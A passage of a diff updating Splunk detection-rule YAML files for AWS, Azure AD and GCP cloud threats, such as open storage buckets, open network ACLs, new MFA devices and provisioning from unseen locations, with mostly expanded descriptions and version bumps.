values(eventName) as command values(src) as src values(userAgent) as userAgent by
|
||||
user userIdentity.arn | where dc_events > 50 | `security_content_ctime(firstTime)`
|
||||
| `security_content_ctime(lastTime)`|`aws_excessive_security_scanning_filter`'
|
||||
how_to_implement: You must install splunk AWS add on and Splunk App for AWS. This
|
||||
search works with AWS CloudTrail logs.
|
||||
@@ -26,7 +30,8 @@ tags:
|
||||
asset_type: AWS Account
|
||||
confidence: 60
|
||||
impact: 30
|
||||
message: User $user$ has excessive number of api calls $dc_events$ from these IP addresses $src$, violating the threshold of 50, using the following commands $command$.
|
||||
message: User $user$ has excessive number of api calls $dc_events$ from these IP
|
||||
addresses $src$, violating the threshold of 50, using the following commands $command$.
|
||||
mitre_attack_id:
|
||||
- T1526
|
||||
observable:
|
||||
@@ -54,7 +59,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1526/aws_security_scanner/aws_security_scanner.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1526/aws_security_scanner/aws_security_scanner.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,12 +1,19 @@
|
||||
name: AWS Network Access Control List Created with All Open Ports
|
||||
id: ada0f478-84a8-4641-a3f1-d82362d6bd75
|
||||
version: 2
|
||||
date: '2021-01-11'
|
||||
version: 3
|
||||
date: '2024-05-14'
|
||||
author: Bhavin Patel, Patrick Bareiss, Splunk
|
||||
status: production
|
||||
type: TTP
|
||||
description: The search looks for AWS CloudTrail events to detect if any network ACLs were created with all the ports open to a specified CIDR.
|
||||
data_source:
|
||||
description: The following analytic detects the creation of AWS Network Access Control
|
||||
Lists (ACLs) with all ports open to a specified CIDR. It leverages AWS CloudTrail
|
||||
events, specifically monitoring for `CreateNetworkAclEntry` or `ReplaceNetworkAclEntry`
|
||||
actions with rules allowing all traffic. This activity is significant because it
|
||||
can expose the network to unauthorized access, increasing the risk of data breaches
|
||||
and other malicious activities. If confirmed malicious, an attacker could exploit
|
||||
this misconfiguration to gain unrestricted access to the network, potentially leading
|
||||
to data exfiltration, service disruption, or further compromise of the AWS environment.
|
||||
data_source:
|
||||
- AWS CloudTrail CreateNetworkAclEntry
|
||||
- AWS CloudTrail ReplaceNetworkAclEntry
|
||||
search: '`cloudtrail` eventName=CreateNetworkAclEntry OR eventName=ReplaceNetworkAclEntry
|
||||
@@ -32,7 +39,8 @@ tags:
|
||||
asset_type: AWS Instance
|
||||
confidence: 80
|
||||
impact: 60
|
||||
message: User $user_arn$ has created network ACLs with all the ports open to a specified CIDR $requestParameters.cidrBlock$
|
||||
message: User $user_arn$ has created network ACLs with all the ports open to a specified
|
||||
CIDR $requestParameters.cidrBlock$
|
||||
mitre_attack_id:
|
||||
- T1562.007
|
||||
- T1562
|
||||
@@ -66,7 +74,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1562.007/aws_create_acl/aws_cloudtrail_events.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1562.007/aws_create_acl/aws_cloudtrail_events.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,14 +1,18 @@
|
||||
name: AWS New MFA Method Registered For User
|
||||
id: 4e3c26f2-4fb9-4bd7-ab46-1b76ffa2a23b
|
||||
version: 1
|
||||
date: '2023-01-31'
|
||||
version: 2
|
||||
date: '2024-05-13'
|
||||
author: Bhavin Patel, Splunk
|
||||
status: production
|
||||
type: TTP
|
||||
description: The following analytic identifies the registration of a new Multi Factor
|
||||
authentication method for an AWS account. Adversaries who have obtained unauthorized
|
||||
access to an AWS account may register a new MFA method to maintain persistence.
|
||||
data_source:
|
||||
description: The following analytic detects the registration of a new Multi-Factor
|
||||
Authentication (MFA) method for an AWS account. It leverages AWS CloudTrail logs
|
||||
to identify the `CreateVirtualMFADevice` event. This activity is significant because
|
||||
adversaries who gain unauthorized access to an AWS account may register a new MFA
|
||||
method to maintain persistence. If confirmed malicious, this could allow attackers
|
||||
to secure their access, making it difficult to detect and remove their presence,
|
||||
potentially leading to further unauthorized activities and data breaches.
|
||||
data_source:
|
||||
- AWS CloudTrail CreateVirtualMFADevice
|
||||
search: ' `cloudtrail` eventName=CreateVirtualMFADevice | stats count values(requestParameters.virtualMFADeviceName)
|
||||
as virtualMFADeviceName min(_time) as firstTime max(_time) as lastTime by eventSource
|
||||
@@ -64,7 +68,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1556.006/aws_new_mfa_method_registered_for_user/cloudtrail.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1556.006/aws_new_mfa_method_registered_for_user/cloudtrail.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
name: Azure AD Privileged Role Assigned
|
||||
id: a28f0bc3-3400-4a6e-a2da-89b9e95f0d2a
|
||||
version: 2
|
||||
version: 3
|
||||
date: '2023-12-20'
|
||||
author: Mauricio Velazco, Gowthamaraj Rajendran, Splunk
|
||||
status: production
|
||||
@@ -14,10 +14,10 @@ data_source:
|
||||
search: ' `azure_monitor_aad` "operationName"="Add member to role" | rename properties.* as *
|
||||
| rename initiatedBy.user.userPrincipalName as initiatedBy
|
||||
| rename targetResources{}.modifiedProperties{}.newValue as roles
|
||||
| eval role=mvindex(roles,1)
|
||||
| eval role=mvindex(roles,1)
|
||||
| stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by initiatedBy, result, operationName, role
|
||||
| lookup privileged_azure_ad_roles azureadrole AS role OUTPUT isprvilegedadrole description
|
||||
| search isprvilegedadrole = True
|
||||
| stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by initiatedBy, result, operationName, role, description
|
||||
| search isprvilegedadrole = True
|
||||
| `security_content_ctime(firstTime)`
|
||||
| `security_content_ctime(lastTime)`
|
||||
| `azure_ad_privileged_role_assigned_filter`'
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
name: Azure AD Privileged Role Assigned to Service Principal
|
||||
id: 5dfaa3d3-e2e4-4053-8252-16d9ee528c41
|
||||
version: 2
|
||||
version: 3
|
||||
date: '2023-12-20'
|
||||
author: Mauricio Velazco, Splunk
|
||||
status: production
|
||||
@@ -16,9 +16,9 @@ search: ' `azure_monitor_aad` operationName="Add member to role"
|
||||
| eval role=mvindex(roles,1)
|
||||
| rename targetResources{}.displayName as apps
|
||||
| eval displayName=mvindex(apps,0)
|
||||
| stats count min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName by initiatedBy, result, operationName, role
|
||||
| lookup privileged_azure_ad_roles azureadrole AS role OUTPUT isprvilegedadrole description
|
||||
| search isprvilegedadrole = True
|
||||
| stats count min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName by initiatedBy, result, operationName, role
|
||||
| `security_content_ctime(firstTime)`
|
||||
| `security_content_ctime(lastTime)`
|
||||
| `azure_ad_privileged_role_assigned_to_service_principal_filter`'
|
||||
|
||||
@@ -1,12 +1,17 @@
|
||||
name: Cloud Compute Instance Created By Previously Unseen User
|
||||
id: 37a0ec8d-827e-4d6d-8025-cedf31f3a149
|
||||
version: 2
|
||||
date: '2021-07-13'
|
||||
version: 3
|
||||
date: '2025-05-18'
|
||||
author: Rico Valdez, Splunk
|
||||
status: experimental
|
||||
type: Anomaly
|
||||
description: This search looks for cloud compute instances created by users who have
|
||||
not created them before.
|
||||
description: The following analytic identifies the creation of cloud compute instances
|
||||
by users who have not previously created them. It leverages data from the Change
|
||||
data model, focusing on 'create' actions by users, and cross-references with a baseline
|
||||
of known user activities. This activity is significant as it may indicate unauthorized
|
||||
access or misuse of cloud resources by new or compromised accounts. If confirmed
|
||||
malicious, attackers could deploy unauthorized compute instances, leading to potential
|
||||
data exfiltration, increased costs, or further exploitation within the cloud environment.
|
||||
data_source: []
|
||||
search: '| tstats `security_content_summariesonly` count earliest(_time) as firstTime,
|
||||
latest(_time) as lastTime values(All_Changes.object) as dest from datamodel=Change
|
||||
@@ -58,7 +63,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,13 +1,18 @@
|
||||
name: Cloud Compute Instance Created In Previously Unused Region
|
||||
id: fa4089e2-50e3-40f7-8469-d2cc1564ca59
|
||||
version: 1
|
||||
date: '2020-09-02'
|
||||
version: 2
|
||||
date: '2024-05-10'
|
||||
author: David Dorsey, Splunk
|
||||
status: experimental
|
||||
type: Anomaly
|
||||
description: This search looks at cloud-infrastructure events where an instance is
|
||||
created in any region within the last hour and then compares it to a lookup file
|
||||
of previously seen regions where instances have been created.
|
||||
description: The following analytic detects the creation of a cloud compute instance
|
||||
in a region that has not been previously used within the last hour. It leverages
|
||||
cloud infrastructure logs and compares the regions of newly created instances against
|
||||
a lookup file of historically used regions. This activity is significant because
|
||||
the creation of instances in new regions can indicate unauthorized or suspicious
|
||||
activity, such as an attacker attempting to evade detection or establish a foothold
|
||||
in a less monitored area. If confirmed malicious, this could lead to unauthorized
|
||||
resource usage, data exfiltration, or further compromise of the cloud environment.
|
||||
data_source: []
|
||||
search: '| tstats earliest(_time) as firstTime latest(_time) as lastTime values(All_Changes.object_id)
|
||||
as dest, count from datamodel=Change where All_Changes.action=created by All_Changes.vendor_region,
|
||||
@@ -61,7 +66,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,12 +1,17 @@
|
||||
name: Cloud Instance Modified By Previously Unseen User
|
||||
id: 7fb15084-b14e-405a-bd61-a6de15a40722
|
||||
version: 1
|
||||
date: '2020-07-29'
|
||||
version: 2
|
||||
date: '2024-05-17'
|
||||
author: Rico Valdez, Splunk
|
||||
status: experimental
|
||||
type: Anomaly
|
||||
description: This search looks for cloud instances being modified by users who have
|
||||
not previously modified them.
|
||||
description: The following analytic identifies cloud instances being modified by users
|
||||
who have not previously modified them. It leverages data from the Change data model,
|
||||
focusing on successful modifications of EC2 instances. This activity is significant
|
||||
because it can indicate unauthorized or suspicious changes by potentially compromised
|
||||
or malicious users. If confirmed malicious, this could lead to unauthorized access,
|
||||
configuration changes, or potential disruption of cloud services, posing a significant
|
||||
risk to the organization's cloud infrastructure.
|
||||
data_source: []
|
||||
search: '| tstats `security_content_summariesonly` count earliest(_time) as firstTime,
|
||||
latest(_time) as lastTime values(All_Changes.object_id) as object_id values(All_Changes.command)
|
||||
@@ -57,7 +62,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,14 +1,18 @@
|
||||
name: Cloud Provisioning Activity From Previously Unseen City
|
||||
id: e7ecc5e0-88df-48b9-91af-51104c68f02f
|
||||
version: 1
|
||||
date: '2020-10-09'
|
||||
version: 2
|
||||
date: '2024-05-16'
|
||||
author: Rico Valdez, Bhavin Patel, Splunk
|
||||
status: production
|
||||
type: Anomaly
|
||||
description: This search looks for cloud provisioning activities from previously unseen
|
||||
cities. Provisioning activities are defined broadly as any event that runs or creates
|
||||
something.
|
||||
data_source:
|
||||
description: The following analytic detects cloud provisioning activities originating
|
||||
from previously unseen cities. It leverages cloud infrastructure logs and compares
|
||||
the geographic location of the source IP address against a baseline of known locations.
|
||||
This activity is significant as it may indicate unauthorized access or misuse of
|
||||
cloud resources from an unexpected location. If confirmed malicious, this could
|
||||
lead to unauthorized resource creation, potential data exfiltration, or further
|
||||
compromise of cloud infrastructure.
|
||||
data_source:
|
||||
- AWS CloudTrail
|
||||
search: '| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change
|
||||
where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success
|
||||
@@ -31,15 +35,15 @@ how_to_implement: You must be ingesting your cloud infrastructure logs from your
|
||||
macro.
|
||||
known_false_positives: 'This is a strictly behavioral search, so we define "false
|
||||
positive" slightly differently. Every time this fires, it will accurately reflect
|
||||
the first occurrence in the time period you''re searching within, plus what is
|
||||
stored in the cache feature. But while there are really no "false positives"
|
||||
in a traditional sense, there is definitely lots of noise.
|
||||
|
||||
This search will fire any time a new IP address is seen in the **GeoIP** database for any kind
|
||||
of provisioning activity. If you typically do all provisioning from tools inside
|
||||
of your country, there should be few false positives. If you are located in countries
|
||||
where the free version of **MaxMind GeoIP** that ships by default with Splunk
|
||||
has weak resolution (particularly small countries in less economically powerful
|
||||
the first occurrence in the time period you''re searching within, plus what is stored
|
||||
in the cache feature. But while there are really no "false positives" in a traditional
|
||||
sense, there is definitely lots of noise.
|
||||
|
||||
This search will fire any time a new IP address is seen in the **GeoIP** database
|
||||
for any kind of provisioning activity. If you typically do all provisioning from
|
||||
tools inside of your country, there should be few false positives. If you are located
|
||||
in countries where the free version of **MaxMind GeoIP** that ships by default with
|
||||
Splunk has weak resolution (particularly small countries in less economically powerful
|
||||
regions), this may be much less valuable to you.'
|
||||
references: []
|
||||
tags:
|
||||
@@ -48,8 +52,8 @@ tags:
|
||||
asset_type: AWS Instance
|
||||
confidence: 60
|
||||
impact: 30
|
||||
message: User $user$ is starting or creating an instance $object$ for the first time
|
||||
in City $City$ from IP address $src$
|
||||
message: User $user$ is starting or creating an instance $object$ for the first
|
||||
time in City $City$ from IP address $src$
|
||||
mitre_attack_id:
|
||||
- T1078
|
||||
observable:
|
||||
@@ -83,7 +87,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,14 +1,18 @@
|
||||
name: Cloud Provisioning Activity From Previously Unseen Country
|
||||
id: 94994255-3acf-4213-9b3f-0494df03bb31
|
||||
version: 1
|
||||
date: '2020-10-09'
|
||||
version: 2
|
||||
date: '2024-05-22'
|
||||
author: Rico Valdez, Bhavin Patel, Splunk
|
||||
status: production
|
||||
type: Anomaly
|
||||
description: This search looks for cloud provisioning activities from previously unseen
|
||||
countries. Provisioning activities are defined broadly as any event that runs or
|
||||
creates something.
|
||||
data_source:
|
||||
description: The following analytic detects cloud provisioning activities originating
|
||||
from previously unseen countries. It leverages cloud infrastructure logs and compares
|
||||
the geographic location of the source IP address against a baseline of known locations.
|
||||
This activity is significant as it may indicate unauthorized access or potential
|
||||
compromise of cloud resources. If confirmed malicious, an attacker could gain control
|
||||
over cloud assets, leading to data breaches, service disruptions, or further infiltration
|
||||
into the network.
|
||||
data_source:
|
||||
- AWS CloudTrail
|
||||
search: '| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change
|
||||
where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success
|
||||
@@ -31,15 +35,15 @@ how_to_implement: You must be ingesting your cloud infrastructure logs from your
|
||||
macro.
|
||||
known_false_positives: 'This is a strictly behavioral search, so we define "false
|
||||
positive" slightly differently. Every time this fires, it will accurately reflect
|
||||
the first occurrence in the time period you''re searching within, plus what is
|
||||
stored in the cache feature. But while there are really no "false positives"
|
||||
in a traditional sense, there is definitely lots of noise.
|
||||
|
||||
This search will fire any time a new IP address is seen in the **GeoIP** database for any kind
|
||||
of provisioning activity. If you typically do all provisioning from tools inside
|
||||
of your country, there should be few false positives. If you are located in countries
|
||||
where the free version of **MaxMind GeoIP** that ships by default with Splunk
|
||||
has weak resolution (particularly small countries in less economically powerful
|
||||
the first occurrence in the time period you''re searching within, plus what is stored
|
||||
in the cache feature. But while there are really no "false positives" in a traditional
|
||||
sense, there is definitely lots of noise.
|
||||
|
||||
This search will fire any time a new IP address is seen in the **GeoIP** database
|
||||
for any kind of provisioning activity. If you typically do all provisioning from
|
||||
tools inside of your country, there should be few false positives. If you are located
|
||||
in countries where the free version of **MaxMind GeoIP** that ships by default with
|
||||
Splunk has weak resolution (particularly small countries in less economically powerful
|
||||
regions), this may be much less valuable to you.'
|
||||
references: []
|
||||
tags:
|
||||
@@ -83,7 +87,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
+21
-16
@@ -1,14 +1,18 @@
|
||||
name: Cloud Provisioning Activity From Previously Unseen IP Address
|
||||
id: f86a8ec9-b042-45eb-92f4-e9ed1d781078
|
||||
version: 1
|
||||
date: '2020-08-16'
|
||||
version: 2
|
||||
date: '2024-05-16'
|
||||
author: Rico Valdez, Splunk
|
||||
status: production
|
||||
type: Anomaly
|
||||
description: This search looks for cloud provisioning activities from previously unseen
|
||||
IP addresses. Provisioning activities are defined broadly as any event that runs
|
||||
or creates something.
|
||||
data_source:
|
||||
description: The following analytic detects cloud provisioning activities originating
|
||||
from previously unseen IP addresses. It leverages cloud infrastructure logs to identify
|
||||
events where resources are created or started, and cross-references these with a
|
||||
baseline of known IP addresses. This activity is significant as it may indicate
|
||||
unauthorized access or potential misuse of cloud resources. If confirmed malicious,
|
||||
an attacker could gain unauthorized control over cloud resources, leading to data
|
||||
breaches, service disruptions, or increased operational costs.
|
||||
data_source:
|
||||
- AWS CloudTrail
|
||||
search: '| tstats earliest(_time) as firstTime, latest(_time) as lastTime, values(All_Changes.object_id)
|
||||
as object_id from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created)
|
||||
@@ -30,15 +34,15 @@ how_to_implement: You must be ingesting your cloud infrastructure logs from your
|
||||
macro.
|
||||
known_false_positives: 'This is a strictly behavioral search, so we define "false
|
||||
positive" slightly differently. Every time this fires, it will accurately reflect
|
||||
the first occurrence in the time period you''re searching within, plus what is
|
||||
stored in the cache feature. But while there are really no "false positives"
|
||||
in a traditional sense, there is definitely lots of noise.
|
||||
|
||||
This search will fire any time a new IP address is seen in the **GeoIP** database for any kind
|
||||
of provisioning activity. If you typically do all provisioning from tools inside
|
||||
of your country, there should be few false positives. If you are located in countries
|
||||
where the free version of **MaxMind GeoIP** that ships by default with Splunk
|
||||
has weak resolution (particularly small countries in less economically powerful
|
||||
the first occurrence in the time period you''re searching within, plus what is stored
|
||||
in the cache feature. But while there are really no "false positives" in a traditional
|
||||
sense, there is definitely lots of noise.
|
||||
|
||||
This search will fire any time a new IP address is seen in the **GeoIP** database
|
||||
for any kind of provisioning activity. If you typically do all provisioning from
|
||||
tools inside of your country, there should be few false positives. If you are located
|
||||
in countries where the free version of **MaxMind GeoIP** that ships by default with
|
||||
Splunk has weak resolution (particularly small countries in less economically powerful
|
||||
regions), this may be much less valuable to you.'
|
||||
references: []
|
||||
tags:
|
||||
@@ -82,7 +86,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,14 +1,18 @@
|
||||
name: Cloud Provisioning Activity From Previously Unseen Region
|
||||
id: 5aba1860-9617-4af9-b19d-aecac16fe4f2
|
||||
version: 1
|
||||
date: '2020-08-16'
|
||||
version: 2
|
||||
date: '2024-05-17'
|
||||
author: Rico Valdez, Bhavin Patel, Splunk
|
||||
status: production
|
||||
type: Anomaly
|
||||
description: This search looks for cloud provisioning activities from previously unseen
|
||||
regions. Provisioning activities are defined broadly as any event that runs or creates
|
||||
something.
|
||||
data_source:
|
||||
description: The following analytic detects cloud provisioning activities originating
|
||||
from previously unseen regions. It leverages cloud infrastructure logs to identify
|
||||
events where resources are started or created, and cross-references these with a
|
||||
baseline of known regions. This activity is significant as it may indicate unauthorized
|
||||
access or misuse of cloud resources from unfamiliar locations. If confirmed malicious,
|
||||
this could lead to unauthorized resource creation, potential data exfiltration,
|
||||
or further compromise of cloud infrastructure.
|
||||
data_source:
|
||||
- AWS CloudTrail
|
||||
search: '| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change
|
||||
where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success
|
||||
@@ -31,15 +35,15 @@ how_to_implement: You must be ingesting your cloud infrastructure logs from your
|
||||
macro.
|
||||
known_false_positives: 'This is a strictly behavioral search, so we define "false
|
||||
positive" slightly differently. Every time this fires, it will accurately reflect
|
||||
the first occurrence in the time period you''re searching within, plus what is
|
||||
stored in the cache feature. But while there are really no "false positives"
|
||||
in a traditional sense, there is definitely lots of noise.
|
||||
|
||||
This search will fire any time a new IP address is seen in the **GeoIP** database for any kind
|
||||
of provisioning activity. If you typically do all provisioning from tools inside
|
||||
of your country, there should be few false positives. If you are located in countries
|
||||
where the free version of **MaxMind GeoIP** that ships by default with Splunk
|
||||
has weak resolution (particularly small countries in less economically powerful
|
||||
the first occurrence in the time period you''re searching within, plus what is stored
|
||||
in the cache feature. But while there are really no "false positives" in a traditional
|
||||
sense, there is definitely lots of noise.
|
||||
|
||||
This search will fire any time a new IP address is seen in the **GeoIP** database
|
||||
for any kind of provisioning activity. If you typically do all provisioning from
|
||||
tools inside of your country, there should be few false positives. If you are located
|
||||
in countries where the free version of **MaxMind GeoIP** that ships by default with
|
||||
Splunk has weak resolution (particularly small countries in less economically powerful
|
||||
regions), this may be much less valuable to you.'
|
||||
references: []
|
||||
tags:
|
||||
@@ -83,7 +87,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,13 +1,17 @@
|
||||
name: Detect GCP Storage access from a new IP
|
||||
id: ccc3246a-daa1-11ea-87d0-0242ac130022
|
||||
version: 1
|
||||
date: '2020-08-10'
|
||||
version: 2
|
||||
date: '2024-05-14'
|
||||
author: Shannon Davis, Splunk
|
||||
status: experimental
|
||||
type: Anomaly
|
||||
description: This search looks at GCP Storage bucket-access logs and detects new or
|
||||
previously unseen remote IP addresses that have successfully accessed a GCP Storage
|
||||
bucket.
|
||||
description: The following analytic identifies access to GCP Storage buckets from
|
||||
new or previously unseen remote IP addresses. It leverages GCP Storage bucket-access
|
||||
logs ingested via Cloud Pub/Sub and compares current access events against a lookup
|
||||
table of previously seen IP addresses. This activity is significant as it may indicate
|
||||
unauthorized access or potential reconnaissance by an attacker. If confirmed malicious,
|
||||
this could lead to data exfiltration, unauthorized data manipulation, or further
|
||||
compromise of the GCP environment.
|
||||
data_source: []
|
||||
search: '`google_gcp_pubsub_message` | multikv | rename sc_status_ as status | rename
|
||||
cs_object_ as bucket_name | rename c_ip_ as remote_ip | rename cs_uri_ as request_uri
|
||||
|
||||
@@ -1,12 +1,17 @@
|
||||
name: Detect New Open GCP Storage Buckets
|
||||
id: f6ea3466-d6bb-11ea-87d0-0242ac130003
|
||||
version: 1
|
||||
date: '2020-08-05'
|
||||
version: 2
|
||||
date: '2024-05-17'
|
||||
author: Shannon Davis, Splunk
|
||||
status: experimental
|
||||
type: TTP
|
||||
description: This search looks for GCP PubSub events where a user has created an open/public
|
||||
GCP Storage bucket.
|
||||
description: The following analytic identifies the creation of new open/public GCP
|
||||
Storage buckets. It leverages GCP PubSub events, specifically monitoring for the
|
||||
`storage.setIamPermissions` method and checks if the `allUsers` member is added.
|
||||
This activity is significant because open storage buckets can expose sensitive data
|
||||
to the public, posing a severe security risk. If confirmed malicious, an attacker
|
||||
could access, modify, or delete data within the bucket, leading to data breaches
|
||||
and potential compliance violations.
|
||||
data_source: []
|
||||
search: '`google_gcp_pubsub_message` data.resource.type=gcs_bucket data.protoPayload.methodName=storage.setIamPermissions
|
||||
| spath output=action path=data.protoPayload.serviceData.policyDelta.bindingDeltas{}.action
|
||||
|
||||
@@ -1,14 +1,18 @@
|
||||
name: Detect New Open S3 buckets
|
||||
id: 2a9b80d3-6340-4345-b5ad-290bf3d0dac4
|
||||
version: 3
|
||||
date: '2021-07-19'
|
||||
version: 4
|
||||
date: '2024-05-19'
|
||||
author: Bhavin Patel, Patrick Bareiss, Splunk
|
||||
status: production
|
||||
type: TTP
|
||||
description: This search looks for AWS CloudTrail events where a user has created
|
||||
an open/public S3 bucket.
|
||||
data_source:
|
||||
- AWS CloudTrail PutBucketAcl
|
||||
description: The following analytic identifies the creation of open/public S3 buckets
|
||||
in AWS. It detects this activity by analyzing AWS CloudTrail events for `PutBucketAcl`
|
||||
actions where the access control list (ACL) grants permissions to all users or authenticated
|
||||
users. This activity is significant because open S3 buckets can expose sensitive
|
||||
data to unauthorized access, leading to data breaches. If confirmed malicious, an
|
||||
attacker could read, write, or fully control the contents of the bucket, potentially
|
||||
leading to data exfiltration or tampering.
|
||||
data_source: []
|
||||
search: '`cloudtrail` eventSource=s3.amazonaws.com eventName=PutBucketAcl | rex field=_raw
|
||||
"(?<json_field>{.+})" | spath input=json_field output=grantees path=requestParameters.AccessControlPolicy.AccessControlList.Grant{}
|
||||
| search grantees=* | mvexpand grantees | spath input=grantees output=uri path=Grantee.URI
|
||||
@@ -62,7 +66,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1530/aws_s3_public_bucket/aws_cloudtrail_events.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1530/aws_s3_public_bucket/aws_cloudtrail_events.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,14 +1,18 @@
|
||||
name: Detect New Open S3 Buckets over AWS CLI
|
||||
id: 39c61d09-8b30-4154-922b-2d0a694ecc22
|
||||
version: 2
|
||||
date: '2021-07-19'
|
||||
version: 3
|
||||
date: '2024-05-19'
|
||||
author: Patrick Bareiss, Splunk
|
||||
status: production
|
||||
type: TTP
|
||||
description: This search looks for AWS CloudTrail events where a user has created
|
||||
an open/public S3 bucket over the aws cli.
|
||||
data_source:
|
||||
- AWS CloudTrail PutBucketAcl
|
||||
description: The following analytic detects the creation of open/public S3 buckets
|
||||
via the AWS CLI. It leverages AWS CloudTrail logs to identify events where a user
|
||||
has set bucket permissions to allow access to "AuthenticatedUsers" or "AllUsers."
|
||||
This activity is significant because open S3 buckets can expose sensitive data to
|
||||
unauthorized users, leading to data breaches. If confirmed malicious, an attacker
|
||||
could gain unauthorized access to potentially sensitive information stored in the
|
||||
S3 bucket, posing a significant security risk.
|
||||
data_source: []
|
||||
search: '`cloudtrail` eventSource="s3.amazonaws.com" (userAgent="[aws-cli*" OR userAgent=aws-cli*
|
||||
) eventName=PutBucketAcl OR requestParameters.accessControlList.x-amz-grant-read-acp
|
||||
